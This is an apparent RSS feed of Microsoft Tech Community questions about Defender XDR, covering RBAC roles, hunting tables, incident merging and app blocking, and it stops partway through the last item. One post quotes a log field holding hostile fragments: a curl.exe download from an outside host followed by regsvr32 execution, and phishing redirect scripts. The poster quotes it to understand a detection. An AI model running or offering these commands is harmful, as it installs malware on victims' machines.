<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#" xmlns:taxo="http://purl.org/rss/1.0/modules/taxonomy/" version="2.0">
  <channel>
    <title>Microsoft Defender XDR topics</title>
    <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/bd-p/MicrosoftThreatProtection</link>
    <description>Microsoft Defender XDR topics</description>
    <pubDate>Thu, 30 Apr 2026 00:47:10 GMT</pubDate>
    <dc:creator>MicrosoftThreatProtection</dc:creator>
    <dc:date>2026-04-30T00:47:10Z</dc:date>
    <item>
      <title>Fishing linking passwords and data</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/fishing-linking-passwords-and-data/m-p/4508090#M2654</link>
      <description>&lt;P&gt;activar control de seguridad mejorada antivirus maleware and fishing data&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Thu, 02 Apr 2026 15:06:48 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/fishing-linking-passwords-and-data/m-p/4508090#M2654</guid>
      <dc:creator>79470Valen</dc:creator>
      <dc:date>2026-04-02T15:06:48Z</dc:date>
    </item>
    <item>
      <title>Why there is no Signature status for the new process in the DeviceProcessEvent table?</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/why-there-is-no-signature-status-for-the-new-process-in-the/m-p/4501503#M2646</link>
      <description>&lt;P&gt;According to the schema, there is only field for checking the initiating (parent) process digital signature, named InitiatingProcessSignatureStatus. So we have information if the process that initiated the execution is signed. However, in many security use-cases it is important to know if the spawned (child) process is digitally signed.&amp;nbsp;&lt;/P&gt;&lt;P&gt;Let's assume that Winword.exe (signed) executed unsigned binary - this is definitely different situation than Winword.exe executing some signed binary (although both may be suspicious, or legitimate).&amp;nbsp;&lt;/P&gt;&lt;P&gt;I feel that some valuable information is not provided, and I'd like to know the reason. Is it related to the logging performance? Or some memory structures, that are present only for the already existing process?&amp;nbsp;&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Thu, 12 Mar 2026 09:22:30 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/why-there-is-no-signature-status-for-the-new-process-in-the/m-p/4501503#M2646</guid>
      <dc:creator>rstanile</dc:creator>
      <dc:date>2026-03-12T09:22:30Z</dc:date>
    </item>
    <item>
      <title>Issues blocking DeepSeek</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/issues-blocking-deepseek/m-p/4497219#M2639</link>
      <description>&lt;P&gt;Hi all,&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;I am investigating DeepSeek usage in our Microsoft security environment and have found inconsistent behaviour between Defender for Cloud Apps, Defender for Endpoint, and IOC controls. I am hoping to understand if others have seen the same.&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Environment&lt;/P&gt;&lt;P&gt;Full Microsoft security and management suite&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;What we are seeing&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Defender for Cloud Apps&lt;/P&gt;&lt;P&gt;DeepSeek is classified as an Unsanctioned app&lt;/P&gt;&lt;P&gt;Cloud Discovery shows ongoing traffic and active usage&lt;/P&gt;&lt;P&gt;Multiple successful sessions and data activity visible&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Defender for Endpoint Indicators&lt;/P&gt;&lt;P&gt;DeepSeek domains and URIs have been added as Indicators with Block action&lt;/P&gt;&lt;P&gt;Indicators show as successfully applied&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Advanced Hunting and Device Timeline&lt;/P&gt;&lt;P&gt;Multiple executable processes are initiating connections to DeepSeek domains&lt;/P&gt;&lt;P&gt;Examples include Edge, Chrome, and other executables making outbound HTTPS connections&lt;/P&gt;&lt;P&gt;Connection status is a mix of Successful and Unsuccessful&lt;/P&gt;&lt;P&gt;No block events recorded&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Settings&lt;/P&gt;&lt;P&gt;Network Protection enabled in block mode&lt;/P&gt;&lt;P&gt;Web Content Filtering enabled&lt;/P&gt;&lt;P&gt;SmartScreen enabled&lt;/P&gt;&lt;P&gt;File Hash Computation enabled&lt;/P&gt;&lt;P&gt;Network Protection Reputation mode set to 1&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Has anyone else had similar issues when trying to block DeepSeek or other apps via Microsoft security suite?&lt;/P&gt;&lt;P&gt;I am currently working with Microsoft support on this but wanted to ask here as well.&lt;/P&gt;</description>
      <pubDate>Thu, 26 Feb 2026 02:45:18 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/issues-blocking-deepseek/m-p/4497219#M2639</guid>
      <dc:creator>KevinJohnson1</dc:creator>
      <dc:date>2026-02-26T02:45:18Z</dc:date>
    </item>
    <item>
      <title>Observed Automation Discrepancies</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/observed-automation-discrepancies/m-p/4493712#M2624</link>
      <description>&lt;P&gt;Hi Team ... I want to know the logic behind the &lt;STRONG&gt;Defender XDR Automation Engine . How it works ?&lt;BR /&gt;&lt;BR /&gt;&lt;/STRONG&gt;&lt;/P&gt;
&lt;P&gt;&lt;STRONG&gt;I have observed Defender XDR Automation Engine Behavior&amp;nbsp;&lt;/STRONG&gt;&lt;SPAN style="color: rgb(30, 30, 30);"&gt;contrary to expectations of identical incident and automation handling in both environments, discrepancies were observed. Specifically, incidents with high-severity alerts were automatically closed by Defender XDR's automation engine before reaching their SOC for review, raising concerns among clients and colleagues. Automation rules are clearly logged in the activity log, whereas actions performed by Microsoft Defender XDR are less transparent .&lt;/SPAN&gt;&lt;/P&gt;
&lt;P&gt;&lt;SPAN style="color: rgb(30, 30, 30);"&gt;A high-severity alert related to a phishing incident was closed by Defender XDR's automation, resulting in the associated incident being closed and removed from SOC review. Wherein the automation was not triggered by our own rules, but by Microsoft's Defender XDR, and sought clarification on the underlying logic.&lt;/SPAN&gt;&lt;/P&gt;</description>
      <pubDate>Mon, 09 Feb 2026 08:54:18 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/observed-automation-discrepancies/m-p/4493712#M2624</guid>
      <dc:creator>Aar123</dc:creator>
      <dc:date>2026-02-09T08:54:18Z</dc:date>
    </item>
    <item>
      <title>Invalidating kerberos tickets via XDR?</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/invalidating-kerberos-tickets-via-xdr/m-p/4489451#M2622</link>
      <description>&lt;P&gt;Since we have alerts every now and then, regarding suspected Pass the Ticket-incidents, I want to know if there's a way to make a user's kerberos ticket invalid? Like we have the "Revoke Session" in Entra ID, is there anything similar that we can do in XDR?&lt;/P&gt;</description>
      <pubDate>Mon, 26 Jan 2026 19:40:38 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/invalidating-kerberos-tickets-via-xdr/m-p/4489451#M2622</guid>
      <dc:creator>JoelNyRe</dc:creator>
      <dc:date>2026-01-26T19:40:38Z</dc:date>
    </item>
    <item>
      <title>Where can I get the latest info on Advanced Hunting Table Retirement</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/where-can-i-get-the-latest-info-on-advanced-hunting-table/m-p/4487557#M2613</link>
      <description>&lt;P&gt;First question - where can I find the latest info on the deprecation of advanced hunting tables?&lt;/P&gt;&lt;P&gt;Background - I was developing some detections and as I was trying to decide on which table I should use I opened up the docs containing the schema for the `EntraIdSignInEvents` table (https://learn.microsoft.com/en-us/defender-xdr/advanced-hunting-entraidsigninevents-table) and was met by two ambiguous banners stating:&amp;nbsp;&lt;/P&gt;&lt;P&gt;"On December 9, 2025, the EntraIdSignInEvents table will replace AADSignInEventsBeta. This change will be made to remove the latter's preview status and to align it with the existing product branding. Both tables will coexist until&amp;nbsp;AADSignInEventsBeta&amp;nbsp;is deprecated after the said date.&lt;/P&gt;&lt;P&gt;To ensure a smooth transition, make sure that you update your queries that use the AADSignInEventsBeta table to use EntraIdSignInEvents before the previously mentioned date. Your custom detections will be updated automatically and won't require any changes."&lt;/P&gt;&lt;P&gt;"Some information relates to prereleased product that may be substantially modified before it's commercially released. Microsoft makes no warranties, express or implied, with respect to the information provided here.&lt;/P&gt;&lt;P&gt;Customers need to have a Microsoft Entra ID P2 license to collect and view activities for this table."&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;This made me very confused as I still have data from AADSignInEventsBeta on my tenant from today. I'm not sure what this means and I'm hoping to get some clear info on table retirement.&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Tue, 20 Jan 2026 11:35:09 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/where-can-i-get-the-latest-info-on-advanced-hunting-table/m-p/4487557#M2613</guid>
      <dc:creator>david_n_o</dc:creator>
      <dc:date>2026-01-20T11:35:09Z</dc:date>
    </item>
    <item>
      <title>Entity playbook in XDR</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/entity-playbook-in-xdr/m-p/4479534#M2598</link>
      <description>&lt;P&gt;Hello All!&lt;/P&gt;&lt;P&gt;In my Logic Apps Sentinel automations I often use the entity trigger to run some workflows. Some time ago there was information, that Sentinel will be moved to the Microsoft XDR, some of the Sentinel elements are already there. In XDR I can run playbook from the incident level, but I can't do it from the entity level - for example in the XDR when I clicked in the IP or when I open IP address page I can't find the Run playbook button or something like that.&lt;/P&gt;&lt;P&gt;Do you know if the Run playbook on entity feature will be moved to XDR also?&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Best,&lt;BR /&gt;Piotr K.&lt;/P&gt;</description>
      <pubDate>Fri, 19 Dec 2025 10:08:37 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/entity-playbook-in-xdr/m-p/4479534#M2598</guid>
      <dc:creator>Kosa</dc:creator>
      <dc:date>2025-12-19T10:08:37Z</dc:date>
    </item>
    <item>
      <title>Scam Defender pop
Up… help please</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/scam-defender-pop-up-help-please/m-p/4479338#M2597</link>
      <description>&lt;P&gt;Can someone please help&lt;/P&gt;&lt;P&gt;my dad has had what looks like scam pop ups come up on his MacBook&amp;nbsp;&lt;/P&gt;&lt;P&gt;I have reported to Microsoft but don’t know how long it will be until they get back to me.&amp;nbsp;&lt;BR /&gt;I want to know if anyone can confirm they’re scams and how I can get them off his screen, it won’t let us click on the X&lt;/P&gt;&lt;img /&gt;&lt;img /&gt;&lt;P&gt;&amp;nbsp;Thank you&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Thu, 18 Dec 2025 18:07:46 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/scam-defender-pop-up-help-please/m-p/4479338#M2597</guid>
      <dc:creator>Hmartin1</dc:creator>
      <dc:date>2025-12-18T18:07:46Z</dc:date>
    </item>
    <item>
      <title>Custom Data Collection - Not Collect Events</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/custom-data-collection-not-collect-events/m-p/4476433#M2590</link>
      <description>&lt;P&gt;Hello,&amp;nbsp;&lt;/P&gt;&lt;P&gt;Have anyone test or implement Custom Data Collection from Defender XDR ?&lt;/P&gt;&lt;P&gt;I try to use this function, i create rule and attach Sentinel Workspace, but for Example the "DeviceCustomProcessEvents" Table remains empty.&lt;/P&gt;&lt;P&gt;But with comand "DeviceProcessEvents" there are events that match the rule that i create.&lt;/P&gt;&lt;P&gt;There is another person that have the same issues ?&lt;/P&gt;&lt;P&gt;Many thanks,&lt;/P&gt;&lt;P&gt;Regards,&lt;/P&gt;&lt;P&gt;Guido&lt;/P&gt;</description>
      <pubDate>Tue, 09 Dec 2025 13:46:42 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/custom-data-collection-not-collect-events/m-p/4476433#M2590</guid>
      <dc:creator>GuidoImpe</dc:creator>
      <dc:date>2025-12-09T13:46:42Z</dc:date>
    </item>
    <item>
      <title>NetworkSignatureInspected</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/networksignatureinspected/m-p/4473718#M2580</link>
      <description>&lt;P&gt;Hi,&lt;/P&gt;&lt;P&gt;Whilst looking into something, I was thrown off by a line in a device timeline export, with ActionType of NetworkSignatureInspected, and the content.&lt;/P&gt;&lt;P&gt;I've read this article, so understand the basics of the function:&lt;/P&gt;&lt;P&gt;&lt;A href="https://techcommunity.microsoft.com/blog/microsoftdefenderatpblog/enrich-your-advanced-hunting-experience-using-network-layer-signals-from-zeek/3794693" target="_blank"&gt;Enrich your advanced hunting experience using network layer signals from Zeek&lt;/A&gt;&lt;/P&gt;&lt;P&gt;I popped over to Sentinel to widen the search as I was initially concerned, but now think it's expected behaviour as I see the same data from different devices.&lt;/P&gt;&lt;P&gt;Can anyone provide any clarity on the contents of AdditionalFields, where the ActionType is NetworkSignatureInspected, references for example CVE-2021-44228:&lt;/P&gt;&lt;P&gt;${token}/sendmessage`,{method:"post",%90%00%02%10%00%00%A1%02%01%10*%A9Cj)|%00%00$%B7%B9%92I%ED%F1%91%0B\%80%8E%E4$%B9%FA%01.%EA%FA&amp;lt;title&amp;gt;redirecting...&amp;lt;/title&amp;gt;&amp;lt;script&amp;gt;window.location.href="https://uyjh8.phiachiphe.ru/bjop8dt8@0uv0/#%90%02%1F@%90%02%1F";%90%00!#SCPT:Trojan:BAT/Qakbot.RVB01!MTB%00%02%00%00%00z%0B%01%10%8C%BAUU)|%00%00%CBw%F9%1Af%E3%B0?\%BE%10|%CC%DA%BE%82%EC%0B%952&amp;amp;&amp;amp;curl.exe--output%25programdata%25\xlhkbo\ff\up2iob.iozv.zmhttps://neptuneimpex.com/bmm/j.png&amp;amp;&amp;amp;echo"fd"&amp;amp;&amp;amp;regsvr32"%90%00!#SCPT:Trojan:HTML/Phish.DMOH1!MTB%00%02%00%00%00{%0B%01%10%F5):[)|%00%00v%F0%ADS%B8i%B2%D4h%EF=E"#%C5%F1%FFl&amp;gt;J&amp;lt;scripttype="text/javascript"&amp;gt;window.location="https://&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;Defender reports no issues on the device and logs (for example DeviceNetworkEvents or CommonSecurityLog) don't return any hits for the sites referenced.&lt;/P&gt;&lt;P&gt;Any assistance with rationalising this would be great, thanks.&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Fri, 28 Nov 2025 10:22:04 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/networksignatureinspected/m-p/4473718#M2580</guid>
      <dc:creator>MrD</dc:creator>
      <dc:date>2025-11-28T10:22:04Z</dc:date>
    </item>
    <item>
      <title>How to stop incidents merging under new incident (MultiStage) in defender.</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/how-to-stop-incidents-merging-under-new-incident-multistage-in/m-p/4472889#M2578</link>
      <description>&lt;P&gt;Dear All&lt;/P&gt;&lt;P&gt;We are experiencing a challenge with the integration between Microsoft Sentinel and the Defender portal where multiple custom rule alerts and analytic rule incidents are being automatically merged into a single incident named &lt;STRONG&gt;"Multistage."&lt;/STRONG&gt;&amp;nbsp;This automatic incident merging affects the granularity and context of our investigations, especially for important custom use cases such as specific admin activities and differentiated analytic logic.&lt;/P&gt;&lt;P&gt;&lt;STRONG&gt;Key concerns include:&lt;/STRONG&gt;&lt;/P&gt;&lt;UL&gt;&lt;LI&gt;Custom rule alerts from Sentinel merging undesirably into a single "Multistage" incident in Defender, causing loss of incident-specific investigation value.&lt;/LI&gt;&lt;LI&gt;Analytic rules arising from different data sources and detection logic are merged, although they represent distinct security events needing separate attention.&lt;/LI&gt;&lt;LI&gt;Customers require and depend on distinct, non-merged incidents for custom use cases, and the current incident correlation and merging behavior undermines this requirement.&lt;/LI&gt;&lt;/UL&gt;&lt;P&gt;We understand that Defender’s incident correlation engine merges incidents based on overlapping entities, timelines, and behaviors but would like guidance or configuration best practices to disable or minimize this automatic merging behavior for our custom and analytic rule incidents. Our goal is to maintain independent incidents corresponding exactly to our custom alerts so that hunting, triage, and response workflows remain precise and actionable.&lt;/P&gt;&lt;P&gt;Any recommendations or advanced configuration options to achieve this separation would be greatly appreciated.&lt;/P&gt;&lt;P&gt;Thank you for your assistance.&lt;/P&gt;&lt;P&gt;Best regards&lt;/P&gt;</description>
      <pubDate>Tue, 25 Nov 2025 14:17:12 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/how-to-stop-incidents-merging-under-new-incident-multistage-in/m-p/4472889#M2578</guid>
      <dc:creator>smavrakis</dc:creator>
      <dc:date>2025-11-25T14:17:12Z</dc:date>
    </item>
    <item>
      <title>Security Admin role replacement with Defender XDR</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/security-admin-role-replacement-with-defender-xdr/m-p/4471330#M2576</link>
      <description>&lt;P&gt;We currently have the &lt;STRONG&gt;Security Administrator&lt;/STRONG&gt; role assigned to multiple users in our organization. We are considering replacing it with &lt;STRONG&gt;custom RBAC roles in Microsoft Defender XDR&lt;/STRONG&gt; as described in &lt;A href="https://learn.microsoft.com/en-us/defender-xdr/custom-roles" target="_blank"&gt;Custom roles for role-based access control - Microsoft Defender XDR | Microsoft Learn&lt;/A&gt;&lt;/P&gt;&lt;P&gt;Our goal is to provide these users &lt;STRONG&gt;full access to the Microsoft Defender security portal&lt;/STRONG&gt; so they can respond to alerts and manage security operations. They &lt;STRONG&gt;do not require access to the Entra ID portal&lt;/STRONG&gt; for tasks such as managing conditional access policies or authentication method policies.&lt;/P&gt;&lt;P&gt;Can we completely remove the &lt;STRONG&gt;Security Administrator&lt;/STRONG&gt; role and rely solely on the custom RBAC role in Defender XDR to meet these requirements?&lt;/P&gt;</description>
      <pubDate>Wed, 19 Nov 2025 12:28:51 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/security-admin-role-replacement-with-defender-xdr/m-p/4471330#M2576</guid>
      <dc:creator>Sharmila1</dc:creator>
      <dc:date>2025-11-19T12:28:51Z</dc:date>
    </item>
    <item>
      <title>Custom data collection in MDE - what is default?</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/custom-data-collection-in-mde-what-is-default/m-p/4471287#M2574</link>
      <description>&lt;P&gt;So you just announced the preview of "Custom data collection in Microsoft Defender for Endpoint (Preview)" which lets me ingest custom data to sentinel.&lt;/P&gt;&lt;P&gt;Is there also an overview of what is default and what I can add?&lt;/P&gt;&lt;P&gt;e.g. we want to examine repeating disconnects from AzureVPN clients&amp;nbsp;&lt;BR /&gt;(yes, it's most likely just Microsoft's fault, as the app ratings show 'everyone' is having them)&lt;BR /&gt;How do I know which data I can add to DeviceCustomNetworkEvents which isnt already in DeviceNetworkEvents?&lt;/P&gt;</description>
      <pubDate>Wed, 19 Nov 2025 09:44:53 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/custom-data-collection-in-mde-what-is-default/m-p/4471287#M2574</guid>
      <dc:creator>AndAufVCG</dc:creator>
      <dc:date>2025-11-19T09:44:53Z</dc:date>
    </item>
    <item>
      <title>Permissions to see and manage sentinel workspace in Defender XDR</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/permissions-to-see-and-manage-sentinel-workspace-in-defender-xdr/m-p/4469552#M2571</link>
      <description>&lt;P&gt;Hi Team,&lt;/P&gt;&lt;P&gt;One of my customers recently completed their Sentinel → Defender portal migration. Initially, I didn’t have access to view the Defender portal, but after the migration I was assigned the Security Operator role in Entra (via PIM), which now allows me to access the Defender portal.However, when I navigate to:&lt;BR /&gt;Defender portal → System → Settings → Microsoft Sentinel → Workspaces. I’m unable to view the available workspaces. The portal shows an insufficient permissions error, and I also cannot switch the primary/secondary workspace. Could you please advise on the exact permissions/roles required to: View the Sentinel workspace list in Defender, and Switch the primary workspace? Thanks in advance&lt;/P&gt;</description>
      <pubDate>Thu, 13 Nov 2025 07:56:14 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/permissions-to-see-and-manage-sentinel-workspace-in-defender-xdr/m-p/4469552#M2571</guid>
      <dc:creator>Abn_V</dc:creator>
      <dc:date>2025-11-13T07:56:14Z</dc:date>
    </item>
    <item>
      <title>XDR RBAC missing Endpoint &amp; Vulnerability Management</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/xdr-rbac-missing-endpoint-vulnerability-management/m-p/4469082#M2568</link>
      <description>&lt;P&gt;I've been looking at ways to provide a user with access to the Vulnerability Dashboard and associated reports without giving them access to anything else within Defender (Email, Cloud App etc) looking at the article &lt;A href="https://learn.microsoft.com/en-us/defender-xdr/activate-defender-rbac" target="_blank"&gt;Activate Microsoft Defender XDR Unified role-based access control (RBAC) - Microsoft Defender XDR | Microsoft Learn&lt;/A&gt; it has a slider for Endpoint Management which I don't appear to have?&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;I have business Premium licences which give me GA access to see the data so I know I'm licenced for it and it works but I can't figure out how to assign permissions.&amp;nbsp;&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;When looking at creating a custom permission here &lt;A href="https://learn.microsoft.com/en-us/defender-xdr/custom-permissions-details#security-posture--posture-management" target="_blank"&gt;Permissions in Microsoft Defender XDR Unified role-based access control (RBAC) - Microsoft Defender XDR | Microsoft Learn&lt;/A&gt; it mentions Security Posture Management would give them Vulnerability Management Level Read which is what I'm after but that doesn't appear to be working. The test account i'm using to try this out just gets an error&amp;nbsp;&lt;/P&gt;&lt;H2&gt;Error getting device data&amp;nbsp;&lt;/H2&gt;&lt;P&gt;&lt;BR /&gt;I'm assuming its because it doesn't have permissions of the device details?&lt;/P&gt;&lt;P&gt;&lt;BR /&gt;&lt;BR /&gt;&lt;/P&gt;</description>
      <pubDate>Tue, 11 Nov 2025 21:54:35 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/xdr-rbac-missing-endpoint-vulnerability-management/m-p/4469082#M2568</guid>
      <dc:creator>MikeLister</dc:creator>
      <dc:date>2025-11-11T21:54:35Z</dc:date>
    </item>
    <item>
      <title>Explorer permission to download an email</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/explorer-permission-to-download-an-email/m-p/4467112#M2565</link>
      <description>&lt;P&gt;Global Admin is allegedly not sufficient access to download an email. So I have a user asking for a copy of her emaill, and I'm telling her 'sorry, I don't have that permission', I'm only global admin'&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;What?&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;The documentation basically forces you to use the new terrible 'role group' system. I see various 'roles' that you need to add to a 'role group' in order to do this.. Some mention Preview, some mention Security Administrator, some mention Security Operator. I've asked copilot 100 different times, and he keeps giving me made up roles. But then linking to the made up role.&amp;nbsp;&lt;BR /&gt;&lt;BR /&gt;How is such a basic functionality broken? It makes 0 sense. I don't want to submit this email - it's not malware or anything. I just want to download the **bleep** thing, and I don't want to have to go through the whole poorview process. This is really basic stuff. I can do this on about 10% of my GA accounts. There's no difference in the permissions - it just seems inconsistent.&amp;nbsp;&lt;/P&gt;</description>
      <pubDate>Tue, 04 Nov 2025 19:08:46 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/explorer-permission-to-download-an-email/m-p/4467112#M2565</guid>
      <dc:creator>underQualifried</dc:creator>
      <dc:date>2025-11-04T19:08:46Z</dc:date>
    </item>
    <item>
      <title>XDR advanced hunting region specific endpoints</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/xdr-advanced-hunting-region-specific-endpoints/m-p/4465691#M2564</link>
      <description>&lt;P&gt;Hi, I am exploring&amp;nbsp; XDR advanced hunting API to fetch data specific to Microsoft Defender for Endpoint tenants. The official documentation (&lt;A href="https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting" target="_blank"&gt;https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting&lt;/A&gt;) mentions to switch to Microsoft Graph advanced hunting API. I had below questions related to it:&lt;/P&gt;&lt;P&gt;&amp;nbsp;&lt;/P&gt;&lt;P&gt;1. To fetch the region specific(US , China, Global) token and Microsoft Graph service root endpoints(&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/graph/deployments#app-registration-and-token-service-root-endpoints " target="_blank"&gt;https://learn.microsoft.com/en-us/graph/deployments#app-registration-and-token-service-root-endpoints &lt;/A&gt;) , is the recommended way to fetch the OpenID configuration document (&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/entra/identity-platform/v2-protocols-oidc#fetch-the-openid-configuration-document" target="_blank"&gt;https://learn.microsoft.com/en-us/entra/identity-platform/v2-protocols-oidc#fetch-the-openid-configuration-document&lt;/A&gt;) for a tenant ID and based on the response, the region specific SERVICE/TOKEN endpoints could be fetched? Since using it, there is no need to maintain different end points for tenants in different regions. And do we use the global service URL &lt;A href="https://login.microsoftonline.com" target="_blank"&gt;https://login.microsoftonline.com&lt;/A&gt; to fetch OpenID config document for a tenantID in any region?&amp;nbsp;&lt;/P&gt;&lt;P&gt;2. As per the documentation, Microsoft Graph Advanced hunting API is not supported in China region (&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/graph/api/security-security-runhuntingquery?view=graph-rest-1.0&amp;amp;tabs=http" target="_blank"&gt;https://learn.microsoft.com/en-us/graph/api/security-security-runhuntingquery?view=graph-rest-1.0&amp;amp;tabs=http&lt;/A&gt;). In this case, is it recommended to use Microsoft XDR Advanced hunting APIs(&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting" target="_blank"&gt;https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting&lt;/A&gt;)&amp;nbsp; to support all region tenants(China, US, Global)?&lt;/P&gt;</description>
      <pubDate>Thu, 30 Oct 2025 17:10:15 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/xdr-advanced-hunting-region-specific-endpoints/m-p/4465691#M2564</guid>
      <dc:creator>ghostrider31</dc:creator>
      <dc:date>2025-10-30T17:10:15Z</dc:date>
    </item>
    <item>
      <title>XDR Advanced hunting API region availability</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/xdr-advanced-hunting-api-region-availability/m-p/4465649#M2563</link>
      <description>&lt;P&gt;Hi, I am exploring&amp;nbsp; XDR advanced hunting API to fetch data specific to Microsoft Defender for Endpoint tenants. The official documentation (&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting" target="_blank"&gt;https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting&lt;/A&gt;) mentions to switch to Microsoft Graph advanced hunting API. I had below questions related to it:&lt;/P&gt;&lt;OL&gt;&lt;LI&gt;To fetch the region specific(US , China, Global) token and Microsoft Graph service root endpoints(&lt;A class="lia-external-url" href="https://learn.microsoft.com/en-us/graph/deployments#app-registration-and-token-service-root-endpoints" target="_blank"&gt;https://learn.microsoft.com/en-us/graph/deployments#app-registration-and-token-service-root-endpoints&lt;/A&gt; ) , is the recommended way to fetch the OpenID configuration document (&lt;A href="https://learn.microsoft.com/en-us/entra/identity-platform/v2-protocols-oidc#find-your-apps-openid-configuration-document-uri" target="_blank"&gt;OpenID Connect (OIDC) on the Microsoft identity platform - Microsoft identity platform | Microsoft Learn&lt;/A&gt;) for a tenant ID and based on the response, the region specific SERVICE/TOKEN endpoints could be fetched? Using it, there is no need to maintain different end points for tenants in different regions. And do we use the global service URL &lt;STRONG&gt;https://login.microsoftonline.com&lt;/STRONG&gt; to fetch OpenID config document for a tenantID in any region?&amp;nbsp;&lt;/LI&gt;&lt;LI&gt;As per the documentation, Microsoft Graph Advanced hunting API is not supported in China region (&lt;A href="https://learn.microsoft.com/en-us/graph/api/security-security-runhuntingquery?view=graph-rest-1.0&amp;amp;tabs=http" target="_blank"&gt;security: runHuntingQuery - Microsoft Graph v1.0 | Microsoft Learn&lt;/A&gt;). In this case, is it recommended to use Microsoft XDR Advanced hunting APIs(&lt;A href="https://learn.microsoft.com/en-us/defender-xdr/api-advanced-hunting" target="_blank"&gt;Microsoft Defender XDR advanced hunting API - Microsoft Defender XDR | Microsoft Learn&lt;/A&gt;)&amp;nbsp; to support all region tenants(China, US, Global)?&lt;/LI&gt;&lt;/OL&gt;</description>
      <pubDate>Thu, 30 Oct 2025 15:39:46 GMT</pubDate>
      <guid>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/xdr-advanced-hunting-api-region-availability/m-p/4465649#M2563</guid>
      <dc:creator>ghostrider31</dc:creator>
      <dc:date>2025-10-30T15:39:46Z</dc:date>
    </item>
    <item>
      <title>Defender for Endpoint | Deception</title>
      <link>https://techcommunity.microsoft.com/t5/microsoft-defender-xdr/defender-for-endpoint-deception/m-p/4464792#M2559</link>
